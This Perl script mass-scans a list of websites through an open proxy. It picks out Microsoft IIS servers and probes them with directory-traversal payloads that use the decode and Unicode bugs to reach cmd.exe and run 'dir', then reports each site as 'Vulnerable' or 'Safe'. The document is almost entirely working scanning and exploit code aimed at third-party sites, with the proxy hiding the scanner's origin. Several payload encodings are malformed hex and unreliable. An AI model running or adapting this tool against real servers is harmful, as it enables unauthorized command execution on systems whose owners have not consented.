#!/usr/bin/perl
#
# This program is based on the decodecheck written by Spidermark.
# It scans (using an OPEN PROXY) a LIST of sites and ONLY probes 
# IIS servers (there's NO reason for checking APACHE and many others).
# If the site is not running IIS, it tells you what server it is and 
# skeep to the next of the list (it saves a lot of time). 
# It checks for the decode and the old unicode vulnerabilities.
#
# Renato Turini - renatoturini@uol.com.br
#
#
$|=1;
@unis=(
"/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%255c../winnt/system32/cmd.exe?/c+dir",
"/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/samples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir",
"/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+dir");

use Socket;

if ($#ARGV<2) {die "Usage: cool2 list proxy proxy_port\n";}

$lista =$ARGV[0];
$proxy=@ARGV[1];
$port=@ARGV[2];



open (FILE, "$lista")||
                       die "Can't open file: $!";
while ($target = <FILE>) {   

   chomp($target);
   print "Testing $target\n";

   $bounce = inet_aton($proxy);
   $flag=0;

   my @iis=sendraw("GET http://$target/index HTTP/1.0\r\n\r\n");
   foreach $line (@iis){
      if ($line =~ /^Server/ && $line =~ /Microsoft-IIS/) {
         print "The site is running:\n";
         print "$line";
         print "let's check it out\n";

         foreach $uni (@unis){
            print ".";
            my @results=sendraw("GET http://$target$uni HTTP/1.0\r\n\r\n");
            foreach $line (@results){
               if ($line =~ /Directory/) {print "Not safe:\n $uni\n"; $flag=1;}
            }
         }

         print "\n";

         if ($flag==1){print "Vulnerable\n\n";}
         else {print "Safe\n\n";}

   
      }  else { 
         if ($line =~ /^Server/){
         print "The site is running:\n";
         print "$line";
         print "skeeping...\n\n"; 
         }
         }

   }

}



# Sendraw - thanx RFP rfp@wiretrip.net
sub sendraw {   # this saves the whole transaction anyway
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$bounce)){
                my @in;
                select(S);      $|=1;   print $pstr;
                while(<S>){ push @in, $_;}
                select(STDOUT); close(S); return @in;
        } else { die("Can't connect...\n"); }
}